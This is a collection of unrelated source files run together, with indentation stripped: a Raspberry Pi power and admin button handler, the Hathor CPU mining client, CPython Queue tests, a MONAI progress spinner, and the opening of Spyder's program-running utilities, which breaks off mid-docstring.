self.agent_2.set_status(AssignState.STATUS_ONBOARDING)
manager._expire_onboarding_pool()
manager.force_expire_hit.assert_called_once_with(
self.agent_2.worker_id, self.agent_2.assignment_id
)
if __name__ == '__main__':
unittest.main(buffer=True)
|
admin_pwr.py
|
#!/usr/bin/env python2.7
import RPi.GPIO as GPIO
import time
import os
import subprocess
from threading import Thread
import socket
import sys
import syslog
# Connect the socket to the port where the server is listening
server_address = '/var/run/uds_led'
hardware = os.popen("cat /proc/cpuinfo | grep Hardware | awk '{print $3}'"
).readlines()[0].strip('\n')
if (hardware == "BCM2835"):
GPIO.setmode(GPIO.BOARD)
# previous bread board setup
# POWER_BUTTON_PIN = 33
# ADMIN_BUTTON_PIN = 35
# MCSC_BUTTON_PIN = 37
# new circult board setup
POWER_BUTTON_PIN = 15
ADMIN_BUTTON_PIN = 13
MCSC_BUTTON_PIN = 11
elif (hardware == "sun8iw11p1"):
GPIO.setmode(GPIO.BOARD)
POWER_BUTTON_PIN = 33
ADMIN_BUTTON_PIN = 35
MCSC_BUTTON_PIN = 37
else:
print "No compatible hardware found! Check /dev/cpuinfo!"
quit()
GPIO.setup(POWER_BUTTON_PIN, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(ADMIN_BUTTON_PIN, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(MCSC_BUTTON_PIN, GPIO.IN, pull_up_down=GPIO.PUD_UP)
POWEROFF_TIMER = 2
REBOOT_TIMER = 5
# global variable to distinguish between modes
# 0: operation
# 1: admin
# 2: admin1/2/3
# 3: program select
# 4: program execution
# 5: program complete
mode = 0
power_flag = 0
mcsc_flag = 0
admin_flag = 0
# variables to store operation mode white and yellow status,
# for when mcsc xor admin buttons are pressed.
op_white = 0
op_yellow = 0
CONF_PATH = "/home/portex/program_config.txt"
def send_command(message):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
sock.connect(server_address)
except socket.error, msg:
print >>sys.stderr, msg
return
try:
# Send data
print >>sys.stderr, 'sending "%s"' % message
sock.sendall(message)
finally:
print >>sys.stderr, 'closing socket'
sock.close()
def power_callback(channel):
global admin_index
global mode
global timer_double_counter
global power_flag
if mode == 0:
time.sleep(0.5)
pressed_time = 0.5
while (GPIO.input(POWER_BUTTON_PIN) == GPIO.LOW):
# while the power button is held down
if (pressed_time >= REBOOT_TIMER):
os.system('wall "Power button pressed for reboot...."')
send_command("green_blink")
# subprocess.call(['/opt/mcs/tnlctl/bin/tnlctl.sh', 'stop'], shell=False)
# subprocess.call(['/opt/mcs/submods/proxy/scripts/ctl.sh', 'stop'], shell=False)
print "MCS Cloud disconnect......."
syslog.syslog(syslog.LOG_INFO, "MCS cloud disconnect.")
os.system('shutdown -r now')
time.sleep(100)
return
time.sleep(1)
pressed_time += 1
if (pressed_time < POWEROFF_TIMER):
os.system('wall "Power button press cancelled."')
else:
os.system('wall "Power button pressed for power off..."')
send_command("green_blink")
# subprocess.call(['/opt/mcs/tnlctl/bin/tnlctl.sh', 'stop'], shell=False)
# subprocess.call(['/opt/mcs/submods/proxy/scripts/ctl.sh', 'stop'], shell=False)
print "MCS Cloud disconnect......."
syslog.syslog(syslog.LOG_INFO, "MCS cloud disconnect.")
os.system('shutdown -h now')
time.sleep(100)
elif mode == 1:
admin_index = 1
send_command("go_to_admin1")
mode = 2
timer_double_counter = 0
elif mode == 3:
# program select here.
power_flag = 1
return
def run_mcsc(type):
# executes after mcsc button press in operation mode.
# if config file not found, or command not found,
# run standard command instead.
# type = start or stop in string.
strip_char_list = " \t\n"
admin_index = "SI"
if type == "start":
program_index = "B37_1"
elif type == "stop":
program_index = "B37_0"
else:
print "run_mcsc type has to be start or stop."
return
file_flag = True
command_list = []
try:
with open(CONF_PATH) as f:
data = f.readlines()
except:
temp_string = CONF_PATH + " file"
temp_string += " not found for run_mcsc."
print temp_string
syslog.syslog(syslog.LOG_WARNING, temp_string)
file_flag = False
if file_flag:
for lines in data:
words = lines.split(":")
if admin_index == words[0].strip(strip_char_list):
if program_index == words[1].strip(strip_char_list):
command_list = words[2].strip(strip_char_list).split(" ")
print command_list
break
if not command_list:
# run standard command here.
if type == "start":
# subprocess.call(['/opt/mcs/tnlctl/bin/tnlctl.sh', 'start'], shell=False)
print "MCS Cloud connect......."
syslog.syslog(syslog.LOG_INFO, "MCS cloud connect.")
elif type == "stop":
# subprocess.call(['/opt/mcs/tnlctl/bin/tnlctl.sh', 'stop'], shell=False)
# subprocess.call(['/opt/mcs/submods/proxy/scripts/ctl.sh', 'stop'], shell=False)
print "MCS Cloud disconnect......."
syslog.syslog(syslog.LOG_INFO, "MCS cloud disconnect.")
else:
try:
return_code = subprocess.call(command_list)
temp_string = "Execute mcsc program " + str(command_list)
temp_string += ", exit " + str(return_code) + "."
syslog.syslog(syslog.LOG_INFO, temp_string)
except:
temp_string = 'mcsc command "' + str(command_list)
temp_string += '" not found.'
syslog.syslog(syslog.LOG_WARNING, temp_string)
return
def mcsc_callback(channel):
global admin_index
global mode
global timer_double_counter
global mcsc_flag
global op_white
time.sleep(.1)
if GPIO.input(MCSC_BUTTON_PIN) == GPIO.HIGH:
print "button let go false event."
return
if mode == 0:
time.sleep(.5)
if (
GPIO.input(ADMIN_BUTTON_PIN) == GPIO.LOW and
GPIO.input(MCSC_BUTTON_PIN) == GPIO.LOW
):
# admin and mcsc both held down after 1 second
print "mcsc operation mode mcsc+admin held down."
return
if op_white == 1:
send_command("white_off")
op_white = 0
# time.sleep(3)
run_mcsc("stop")
else:
send_command("white_on")
op_white = 1
# time.sleep(2)
run_mcsc("start")
elif mode == 1:
time.sleep(.5)
if (
GPIO.input(ADMIN_BUTTON_PIN) == GPIO.LOW and
GPIO.input(MCSC_BUTTON_PIN) == GPIO.LOW
):
# admin and mcsc both held down after 1 second
print "mcsc admin mode mcsc+admin held down."
return
admin_index = 2
send_command("go_to_admin2")
mode = 2
timer_double_counter = 0
elif mode == 3:
# program select here.
mcsc_flag = 1
return
def return_to_operation():
send_command("return_to_operation")
syslog.syslog(syslog.LOG_INFO, 'Return to operation mode.')
return
def return_to_admin():
global timer_double_counter
global admin_flag
global mcsc_flag
global power_flag
timer_double_counter = 0
admin_flag = 0
mcsc_flag = 0
power_flag = 0
send_command("return_to_admin")
return
def run_program():
global mode
time.sleep(6)
total_program_index = admin_flag + (mcsc_flag << 1) + (power_flag << 2)
print "admin index: ", admin_index
print "program index: ", total_program_index
send_command("go_to_execute")
time.sleep(2)
read_and_run(str(admin_index), str(total_program_index))
print "program output here."
time.sleep(6)
mode = 1
return_to_admin()
return
def read_and_run(admin_index, program_index):
# results and their color displays:
# blink blue: return code 0 only
# blink red: return code others
# blink blud_red: all exceptions, and index not found.
strip_char_list = " \t\n"
temp_string = "admin index: " + admin_index
temp_string += ", program index: " + program_index
print temp_string
try:
with open(CONF_PATH) as f:
data = f.readlines()
except:
temp_string = CONF_PATH + " file"
temp_string += " not found."
print temp_string
syslog.syslog(syslog.LOG_WARNING, temp_string)
send_command("admin_blue_red")
return
for lines in data:
words = lines.split(":")
if admin_index == words[0].strip(strip_char_list):
if program_index == words[1].strip(strip_char_list):
command = words[2].strip(strip_char_list).split(" ")
print command
try:
return_code = subprocess.call(command)
temp_string = "execute program " + admin_index
temp_string += "/" + program_index + ", exit "
temp_string += str(return_code) + "."
syslog.syslog(syslog.LOG_INFO, temp_string)
if return_code == 0:
send_command("admin_blink_blue")
else:
send_command("admin_blink_red")
except:
print "cannot execute."
temp_string = 'command "' + str(command)
temp_string += '" not found.'
syslog.syslog(syslog.LOG_WARNING, temp_string)
send_command("admin_blue_red")
finally:
return
# admin/program index not found.
temp_string = "program " + admin_index + "/" + program_index
temp_string += " not found."
print temp_string
syslog.syslog(syslog.LOG_WARNING, temp_string)
send_command("admin_blue_red")
return
def run_admin(type):
# executes after admin button press in operation mode.
# if config file not found, or command not found,
# run standard command instead.
# type = start or stop in string.
strip_char_list = " \t\n"
admin_index = "SI"
if type == "start":
program_index = "B35_1"
elif type == "stop":
program_index = "B35_0"
else:
print "run_admin type has to be start or stop."
return
file_flag = True
command_list = []
try:
with open(CONF_PATH) as f:
data = f.readlines()
except:
temp_string = CONF_PATH + " file"
temp_string += " not found for run_admin."
print temp_string
syslog.syslog(syslog.LOG_WARNING, temp_string)
file_flag = False
if file_flag:
for lines in data:
words = lines.split(":")
if admin_index == words[0].strip(strip_char_list):
if program_index == words[1].strip(strip_char_list):
command_list = words[2].strip(strip_char_list).split(" ")
print command_list
break
if not command_list:
# run standard command here.
print type
if type == "start":
# subprocess.call(['python', '/opt/mcs/cbox_panel_control/bin/led_bt_server.py'],
# shell=False)
# os.system('service bluetooth start')
# os.system('/opt/mcs/cbox_panel_control/bin/led_bt_server.py > /dev/null &')
print "Bluetooth console enable"
syslog.syslog(syslog.LOG_INFO, "Bluetooth console enable.")
elif type == "stop":
# subprocess.call(['ps -ef | grep led_bt_server | grep -v grep |awk \'{print "kill "$2}\' | bash'], shell=True)
# os.system('service bluetooth stop')
send_command("return_to_operation")
print "Bluetooth console disable"
syslog.syslog(syslog.LOG_INFO, "Bluetooth console disable.")
else:
try:
return_code = subprocess.call(command_list)
temp_string = "Execute admin program " + str(command_list)
temp_string += ", exit " + str(return_code) + "."
syslog.syslog(syslog.LOG_INFO, temp_string)
except:
temp_string = 'admin command "' + str(command_list)
temp_string += '" not found.'
syslog.syslog(syslog.LOG_WARNING, temp_string)
return
GPIO.add_event_detect(POWER_BUTTON_PIN, GPIO.FALLING, callback=power_callback,
bouncetime=1000)
GPIO.add_event_detect(MCSC_BUTTON_PIN, GPIO.FALLING, callback=mcsc_callback,
bouncetime=1000)
try:
while True:
while (GPIO.input(ADMIN_BUTTON_PIN) == GPIO.LOW):
time.sleep(1)
ch = GPIO.wait_for_edge(ADMIN_BUTTON_PIN, GPIO.FALLING,
timeout=6000)
#print "Falling edge detected."
if (mode == 0):
# operation mode
if ch is None:
continue
time.sleep(0.5)
if (
GPIO.input(ADMIN_BUTTON_PIN) == GPIO.LOW and
GPIO.input(MCSC_BUTTON_PIN) == GPIO.LOW
):
# admin and mcsc both held down after 1 second,
# enter admin mode
print "admin mode activated."
syslog.syslog(syslog.LOG_INFO, 'Start admin mode.')
mode = 1
return_to_admin()
continue
if op_yellow == 1:
print "yellow_off"
send_command("yellow_off")
op_yellow = 0
# time.sleep(3)
run_admin("stop")
else:
print "yellow on"
send_command("yellow_on")
op_yellow = 1
# time.sleep(2)
run_admin("start")
elif (mode == 1):
if ch is None:
if timer_double_counter > 2:
print "admin timeout in admin mode."
return_to_operation()
mode = 0
continue
else:
timer_double_counter += 1
continue
time.sleep(0.5)
if (
GPIO.input(ADMIN_BUTTON_PIN) == GPIO.LOW and
GPIO.input(MCSC_BUTTON_PIN) == GPIO.LOW
):
print "Returning to operation mode from admin."
return_to_operation()
mode = 0
continue
# if here, go to admin3
admin_index = 3
send_command("go_to_admin3")
mode = 2
timer_double_counter = 0
elif mode == 2:
if ch is None:
if timer_double_counter > 2:
print "admin timeout in admin1/2/3 mode."
return_to_operation()
mode = 0
continue
else:
timer_double_counter += 1
continue
time.sleep(0.5)
if (
GPIO.input(ADMIN_BUTTON_PIN) == GPIO.LOW and
GPIO.input(MCSC_BUTTON_PIN) == GPIO.LOW
):
print "Returning to operation mode from admin3."
return_to_operation()
mode = 0
continue
# admin1/2/3 start.
mode = 3
send_command("admin_blink_red")
run_program_process = Thread(target=run_program)
run_program_process.start()
elif mode == 3:
# program select here.
admin_flag = 1
except KeyboardInterrupt:
print "interrupted."
|
mining.py
|
# Copyright 2021 Hathor Labs
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import datetime
import math
import signal
import sys
import time
from argparse import ArgumentParser, Namespace
from json.decoder import JSONDecodeError
from multiprocessing import Process, Queue
from typing import Tuple
import requests
_SLEEP_ON_ERROR_SECONDS = 5
_MAX_CONN_RETRIES = math.inf
def signal_handler(sig, frame):
sys.exit(0)
def worker(q_in, q_out):
signal.signal(signal.SIGINT, signal_handler)
block, start, end, sleep_seconds = q_in.get()
block.start_mining(start, end, sleep_seconds=sleep_seconds)
q_out.put(block)
def create_parser() -> ArgumentParser:
from hathor.cli.util import create_parser
parser = create_parser()
parser.add_argument('url', help='URL to get mining bytes')
parser.add_argument('--init-delay', type=float, help='Wait N seconds before starting (in seconds)', default=None)
parser.add_argument('--sleep', type=float, help='Sleep every 2 seconds (in seconds)')
parser.add_argument('--count', type=int, help='Quantity of blocks to be mined')
parser.add_argument('--address', help='Address to mine blocks')
return parser
def execute(args: Namespace) -> None:
from requests.exceptions import ConnectionError
from hathor.transaction import Block
from hathor.transaction.exceptions import HathorError
print('Hathor CPU Miner v1.0.0')
print('URL: {}'.format(args.url))
if args.init_delay:
print('Init delay {} seconds'.format(args.init_delay))
time.sleep(args.init_delay)
signal.signal(signal.SIGINT, signal_handler)
sleep_seconds = 0
if args.sleep:
sleep_seconds = args.sleep
total = 0
conn_retries = 0
q_in: Queue[Tuple[Block, int, int, int]]
q_out: Queue[Block]
q_in, q_out = Queue(), Queue()
while True:
print('Requesting mining information...')
try:
params = {}
if args.address:
params['address'] = args.address
response = requests.get(args.url, params=params)
except ConnectionError as e:
print('Error connecting to server: {}'.format(args.url))
print(e)
if conn_retries >= _MAX_CONN_RETRIES:
print('Too many connection failures, giving up.')
sys.exit(1)
else:
conn_retries += 1
print('Waiting {} seconds to try again ({} of {})...'.format(_SLEEP_ON_ERROR_SECONDS, conn_retries,
_MAX_CONN_RETRIES))
time.sleep(_SLEEP_ON_ERROR_SECONDS)
continue
else:
conn_retries = 0
if response.status_code == 503:
print('Node still syncing. Waiting {} seconds to try again...'.format(_SLEEP_ON_ERROR_SECONDS))
time.sleep(_SLEEP_ON_ERROR_SECONDS)
continue
try:
data = response.json()
except JSONDecodeError as e:
print('Error reading response from server: {}'.format(response))
print(e)
print('Waiting {} seconds to try again...'.format(_SLEEP_ON_ERROR_SECONDS))
time.sleep(_SLEEP_ON_ERROR_SECONDS)
continue
if 'block_bytes' not in data:
print('Something is wrong in the response.')
print(data)
time.sleep(_SLEEP_ON_ERROR_SECONDS)
continue
block_bytes = base64.b64decode(data['block_bytes'])
block = Block.create_from_struct(block_bytes)
assert block.hash is not None
assert isinstance(block, Block)
print('Mining block with weight {}'.format(block.weight))
p = Process(target=worker, args=(q_in, q_out))
p.start()
q_in.put((block, 0, 2**32, sleep_seconds))
p.join()
block = q_out.get()
block.update_hash()
assert block.hash is not None
print('[{}] New block found: {} (nonce={}, weight={})'.format(datetime.datetime.now(), block.hash.hex(),
block.nonce, block.weight))
try:
block.verify_without_storage()
except HathorError:
print('[{}] ERROR: Block has not been pushed because it is not valid.'.format(datetime.datetime.now()))
else:
block_bytes = block.get_struct()
response = requests.post(args.url, json={'block_bytes': base64.b64encode(block_bytes).decode('utf-8')})
if not response.ok:
print('[{}] ERROR: Block has been rejected. Unknown exception.'.format(datetime.datetime.now()))
if response.ok and response.text != '1':
print('[{}] ERROR: Block has been rejected.'.format(datetime.datetime.now()))
print('')
total += 1
if args.count and total == args.count:
break
def main():
parser = create_parser()
args = parser.parse_args()
execute(args)
|
test_queue.py
|
# Some simple queue module tests, plus some failure conditions
# to ensure the Queue locks remain stable.
import Queue
import time
import unittest
from test import test_support
threading = test_support.import_module('threading')
QUEUE_SIZE = 5
# A thread to run a function that unclogs a blocked Queue.
class _TriggerThread(threading.Thread):
def __init__(self, fn, args):
self.fn = fn
self.args = args
self.startedEvent = threading.Event()
threading.Thread.__init__(self)
def run(self):
# The sleep isn't necessary, but is intended to give the blocking
# function in the main thread a chance at actually blocking before
# we unclog it. But if the sleep is longer than the timeout-based
# tests wait in their blocking functions, those tests will fail.
# So we give them much longer timeout values compared to the
# sleep here (I aimed at 10 seconds for blocking functions --
# they should never actually wait that long - they should make
# progress as soon as we call self.fn()).
time.sleep(0.1)
self.startedEvent.set()
self.fn(*self.args)
# Execute a function that blocks, and in a separate thread, a function that
# triggers the release. Returns the result of the blocking function. Caution:
# block_func must guarantee to block until trigger_func is called, and
# trigger_func must guarantee to change queue state so that block_func can make
# enough progress to return. In particular, a block_func that just raises an
# exception regardless of whether trigger_func is called will lead to
# timing-dependent sporadic failures, and one of those went rarely seen but
# undiagnosed for years. Now block_func must be unexceptional. If block_func
# is supposed to raise an exception, call do_exceptional_blocking_test()
# instead.
class BlockingTestMixin:
def tearDown(self):
self.t = None
def do_blocking_test(self, block_func, block_args, trigger_func, trigger_args):
self.t = _TriggerThread(trigger_func, trigger_args)
self.t.start()
self.result = block_func(*block_args)
# If block_func returned before our thread made the call, we failed!
if not self.t.startedEvent.is_set():
self.fail("blocking function '%r' appeared not to block" %
block_func)
self.t.join(10) # make sure the thread terminates
if self.t.is_alive():
self.fail("trigger function '%r' appeared to not return" %
trigger_func)
return self.result
# Call this instead if block_func is supposed to raise an exception.
def do_exceptional_blocking_test(self,block_func, block_args, trigger_func,
trigger_args, expected_exception_class):
self.t = _TriggerThread(trigger_func, trigger_args)
self.t.start()
try:
try:
block_func(*block_args)
except expected_exception_class:
raise
else:
self.fail("expected exception of kind %r" %
expected_exception_class)
finally:
self.t.join(10) # make sure the thread terminates
if self.t.is_alive():
self.fail("trigger function '%r' appeared to not return" %
trigger_func)
if not self.t.startedEvent.is_set():
self.fail("trigger thread ended but event never set")
class BaseQueueTest(BlockingTestMixin):
def setUp(self):
self.cum = 0
self.cumlock = threading.Lock()
def simple_queue_test(self, q):
if not q.empty():
raise RuntimeError, "Call this function with an empty queue"
# I guess we better check things actually queue correctly a little :)
q.put(111)
q.put(333)
q.put(222)
target_order = dict(Queue = [111, 333, 222],
LifoQueue = [222, 333, 111],
PriorityQueue = [111, 222, 333])
actual_order = [q.get(), q.get(), q.get()]
self.assertEqual(actual_order, target_order[q.__class__.__name__],
"Didn't seem to queue the correct data!")
for i in range(QUEUE_SIZE-1):
q.put(i)
self.assertTrue(not q.empty(), "Queue should not be empty")
self.assertTrue(not q.full(), "Queue should not be full")
last = 2 * QUEUE_SIZE
full = 3 * 2 * QUEUE_SIZE
q.put(last)
self.assertTrue(q.full(), "Queue should be full")
try:
q.put(full, block=0)
self.fail("Didn't appear to block with a full queue")
except Queue.Full:
pass
try:
q.put(full, timeout=0.01)
self.fail("Didn't appear to time-out with a full queue")
except Queue.Full:
pass
# Test a blocking put
self.do_blocking_test(q.put, (full,), q.get, ())
self.do_blocking_test(q.put, (full, True, 10), q.get, ())
# Empty it
for i in range(QUEUE_SIZE):
q.get()
self.assertTrue(q.empty(), "Queue should be empty")
try:
q.get(block=0)
self.fail("Didn't appear to block with an empty queue")
except Queue.Empty:
pass
try:
q.get(timeout=0.01)
self.fail("Didn't appear to time-out with an empty queue")
except Queue.Empty:
pass
# Test a blocking get
self.do_blocking_test(q.get, (), q.put, ('empty',))
self.do_blocking_test(q.get, (True, 10), q.put, ('empty',))
def worker(self, q):
while True:
x = q.get()
if x is None:
q.task_done()
return
with self.cumlock:
self.cum += x
q.task_done()
def queue_join_test(self, q):
self.cum = 0
for i in (0,1):
threading.Thread(target=self.worker, args=(q,)).start()
for i in xrange(100):
q.put(i)
q.join()
self.assertEqual(self.cum, sum(range(100)),
"q.join() did not block until all tasks were done")
for i in (0,1):
q.put(None) # instruct the threads to close
q.join() # verify that you can join twice
def test_queue_task_done(self):
# Test to make sure a queue task completed successfully.
q = self.type2test()
try:
q.task_done()
except ValueError:
pass
else:
self.fail("Did not detect task count going negative")
def test_queue_join(self):
# Test that a queue join()s successfully, and before anything else
# (done twice for insurance).
q = self.type2test()
self.queue_join_test(q)
self.queue_join_test(q)
try:
q.task_done()
except ValueError:
pass
else:
self.fail("Did not detect task count going negative")
def test_simple_queue(self):
# Do it a couple of times on the same queue.
# Done twice to make sure works with same instance reused.
q = self.type2test(QUEUE_SIZE)
self.simple_queue_test(q)
self.simple_queue_test(q)
class QueueTest(BaseQueueTest, unittest.TestCase):
type2test = Queue.Queue
class LifoQueueTest(BaseQueueTest, unittest.TestCase):
type2test = Queue.LifoQueue
class PriorityQueueTest(BaseQueueTest, unittest.TestCase):
type2test = Queue.PriorityQueue
# A Queue subclass that can provoke failure at a moment's notice :)
class FailingQueueException(Exception):
pass
class FailingQueue(Queue.Queue):
def __init__(self, *args):
self.fail_next_put = False
self.fail_next_get = False
Queue.Queue.__init__(self, *args)
def _put(self, item):
if self.fail_next_put:
self.fail_next_put = False
raise FailingQueueException, "You Lose"
return Queue.Queue._put(self, item)
def _get(self):
if self.fail_next_get:
self.fail_next_get = False
raise FailingQueueException, "You Lose"
return Queue.Queue._get(self)
class FailingQueueTest(BlockingTestMixin, unittest.TestCase):
def failing_queue_test(self, q):
if not q.empty():
raise RuntimeError, "Call this function with an empty queue"
for i in range(QUEUE_SIZE-1):
q.put(i)
# Test a failing non-blocking put.
q.fail_next_put = True
try:
q.put("oops", block=0)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.fail_next_put = True
try:
q.put("oops", timeout=0.1)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.put("last")
self.assertTrue(q.full(), "Queue should be full")
# Test a failing blocking put
q.fail_next_put = True
try:
self.do_blocking_test(q.put, ("full",), q.get, ())
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
# Check the Queue isn't damaged.
# put failed, but get succeeded - re-add
q.put("last")
# Test a failing timeout put
q.fail_next_put = True
try:
self.do_exceptional_blocking_test(q.put, ("full", True, 10), q.get, (),
FailingQueueException)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
# Check the Queue isn't damaged.
# put failed, but get succeeded - re-add
q.put("last")
self.assertTrue(q.full(), "Queue should be full")
q.get()
self.assertTrue(not q.full(), "Queue should not be full")
q.put("last")
self.assertTrue(q.full(), "Queue should be full")
# Test a blocking put
self.do_blocking_test(q.put, ("full",), q.get, ())
# Empty it
for i in range(QUEUE_SIZE):
q.get()
self.assertTrue(q.empty(), "Queue should be empty")
q.put("first")
q.fail_next_get = True
try:
q.get()
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
self.assertTrue(not q.empty(), "Queue should not be empty")
q.fail_next_get = True
try:
q.get(timeout=0.1)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
self.assertTrue(not q.empty(), "Queue should not be empty")
q.get()
self.assertTrue(q.empty(), "Queue should be empty")
q.fail_next_get = True
try:
self.do_exceptional_blocking_test(q.get, (), q.put, ('empty',),
FailingQueueException)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
# put succeeded, but get failed.
self.assertTrue(not q.empty(), "Queue should not be empty")
q.get()
self.assertTrue(q.empty(), "Queue should be empty")
def test_failing_queue(self):
# Test to make sure a queue is functioning correctly.
# Done twice to the same instance.
q = FailingQueue(QUEUE_SIZE)
self.failing_queue_test(q)
self.failing_queue_test(q)
def test_main():
test_support.run_unittest(QueueTest, LifoQueueTest, PriorityQueueTest,
FailingQueueTest)
if __name__ == "__main__":
test_main()
|
spinner.py
|
# Copyright 2021 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import itertools
import sys
from multiprocessing import Event, Lock, Process
class ProgressSpinner:
"""
Progress spinner for console.
"""
def __init__(self, message, delay=0.2):
self.spinner_symbols = itertools.cycle(["-", "\\", "|", "/"])
self.delay = delay
self.stop_event = Event()
self.spinner_visible = False
sys.stdout.write(message)
def __enter__(self):
self.start()
def __exit__(self, exception, value, traceback):
self.stop()
def _spinner_task(self):
while not self.stop_event.wait(self.delay):
self._remove_spinner()
self._write_next_symbol()
def _write_next_symbol(self):
with self._spinner_lock:
if not self.spinner_visible:
sys.stdout.write(next(self.spinner_symbols))
self.spinner_visible = True
sys.stdout.flush()
def _remove_spinner(self, cleanup=False):
with self._spinner_lock:
if self.spinner_visible:
sys.stdout.write("\b")
self.spinner_visible = False
if cleanup:
# overwrite spinner symbol with whitespace
sys.stdout.write(" ")
sys.stdout.write("\r")
sys.stdout.flush()
def start(self):
"""
Start spinner as a separate process.
"""
if sys.stdout.isatty():
self._spinner_lock = Lock()
self.stop_event.clear()
self.spinner_process = Process(target=self._spinner_task)
self.spinner_process.start()
def stop(self):
"""
Stop spinner process.
"""
sys.stdout.write("\b")
sys.stdout.write("Done")
if sys.stdout.isatty():
self.stop_event.set()
self._remove_spinner(cleanup=True)
self.spinner_process.join()
sys.stdout.write("\n")
else:
sys.stdout.write("\r")
|
programs.py
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""Running programs utilities."""
from __future__ import print_function
# Standard library imports
from ast import literal_eval
from getpass import getuser
from textwrap import dedent
import glob
import importlib
import itertools
import os
import os.path as osp
import re
import subprocess
import sys
import tempfile
import threading
import time
# Third party imports
import pkg_resources
from pkg_resources import parse_version
import psutil
# Local imports
from spyder.config.base import (is_stable_version, running_under_pytest,
get_home_dir)
from spyder.config.utils import is_anaconda
from spyder.py3compat import PY2, is_text_string, to_text_string
from spyder.utils import encoding
from spyder.utils.misc import get_python_executable
HERE = osp.abspath(osp.dirname(__file__))
class ProgramError(Exception):
pass
def get_temp_dir(suffix=None):
"""
Return temporary Spyder directory, checking previously that it exists.
"""
to_join = [tempfile.gettempdir()]
if os.name == 'nt':
to_join.append('spyder')
else:
username = encoding.to_unicode_from_fs(getuser())
to_join.append('spyder-' + username)
if suffix is not None:
to_join.append(suffix)
tempdir = osp.join(*to_join)
if not osp.isdir(tempdir):
os.mkdir(tempdir)
return tempdir
def is_program_installed(basename):
"""
Return program absolute path if installed in PATH.
Otherwise, return None.
Also searches specific platform dependent paths that are not already in
PATH. This permits general use without assuming user profiles are
sourced (e.g. .bash_Profile), such as when login shells are not used to
launch Spyder.
On macOS systems, a .app is considered installed if it exists.
"""
home = get_home_dir()
req_paths = []
if sys.platform == 'darwin':
if basename.endswith('.app') and osp.exists(basename):
return basename
pyenv = [
osp.join('/usr', 'local', 'bin'),
osp.join(home, '.pyenv', 'bin')
]
# Prioritize Anaconda before Miniconda; local before global.
a = [osp.join(home, 'opt'), '/opt']
b = ['anaconda', 'miniconda', 'anaconda3', 'miniconda3']
conda = [osp.join(*p, 'condabin') for p in itertools.product(a, b)]
req_paths.extend(pyenv + conda)
elif sys.platform.startswith('linux'):
pyenv = [
osp.join('/usr', 'local', 'bin'),
osp.join(home, '.pyenv', 'bin')
]
a = [home, '/opt']
b = ['anaconda', 'miniconda', 'anaconda3', 'miniconda3']
conda = [osp.join(*p, 'condabin') for p in itertools.product(a, b)]
req_paths.extend(pyenv + conda)
elif os.name == 'nt':
pyenv = [osp.join(home, '.pyenv', 'pyenv-win', 'bin')]
a = [home, 'C:\\', osp.join('C:\\', 'ProgramData')]
b = ['Anaconda', 'Miniconda', 'Anaconda3', 'Miniconda3']
conda = [osp.join(*p, 'condabin') for p in itertools.product(a, b)]
req_paths.extend(pyenv + conda)
for path in os.environ['PATH'].split(os.pathsep) + req_paths:
abspath = osp.join(path, basename)
if osp.isfile(abspath):
return abspath
def find_program(basename):
"""
Find program in PATH and return absolute path
Try adding .exe or .bat to basename on Windows platforms
(return None if not found)
"""
names = [basename]
if os.name == 'nt':
# Windows platforms
extensions = ('.exe', '.bat', '.cmd')
if not basename.endswith(extensions):
names = [basename+ext for ext in extensions]+[basename]
for name in names:
path = is_program_installed(name)
if path:
return path
def get_full_command_for_program(path):
"""
Return the list of tokens necessary to open the program
at a given path.
On macOS systems, this function prefixes .app paths with
'open -a', which is necessary to run the application.
On all other OS's, this function has no effect.
:str path: The path of the program to run.
:return: The list of tokens necessary to run the program.
"""
if sys.platform == 'darwin' and path.endswith('.app'):
return ['open', '-a', path]
return [path]
def alter_subprocess_kwargs_by_platform(**kwargs):
"""
Given a dict, populate kwargs to create a generally
useful default setup for running subprocess processes
on different platforms. For example, `close_fds` is
set on posix and creation of a new console window is
disabled on Windows.
This function will alter the given kwargs and return
the modified dict.
"""
kwargs.setdefault('close_fds', os.name == 'posix')
if os.name == 'nt':
CONSOLE_CREATION_FLAGS = 0 # Default value
# See: https://msdn.microsoft.com/en-us/library/windows/desktop/ms684863%28v=vs.85%29.aspx
CREATE_NO_WINDOW = 0x08000000
# We "or" them together
CONSOLE_CREATION_FLAGS |= CREATE_NO_WINDOW
kwargs.setdefault('creationflags', CONSOLE_CREATION_FLAGS)
# ensure Windows subprocess environment has SYSTEMROOT
if kwargs.get('env') is not None:
# Is SYSTEMROOT, SYSTEMDRIVE in env? case insensitive
for env_var in ['SYSTEMROOT', 'SYSTEMDRIVE']:
if env_var not in map(str.upper, kwargs['env'].keys()):
# Add from os.environ
for k, v in os.environ.items():
if env_var == k.upper():
kwargs['env'].update({k: v})
break # don't risk multiple values
else:
# linux and macOS
if kwargs.get('env') is not None:
if 'HOME' not in kwargs['env']:
kwargs['env'].update({'HOME': get_home_dir()})
return kwargs
def run_shell_command(cmdstr, **subprocess_kwargs):
"""
Execute the given shell command.
Note that *args and **kwargs will be passed to the subprocess call.
If 'shell' is given in subprocess_kwargs it must be True,
otherwise ProgramError will be raised.
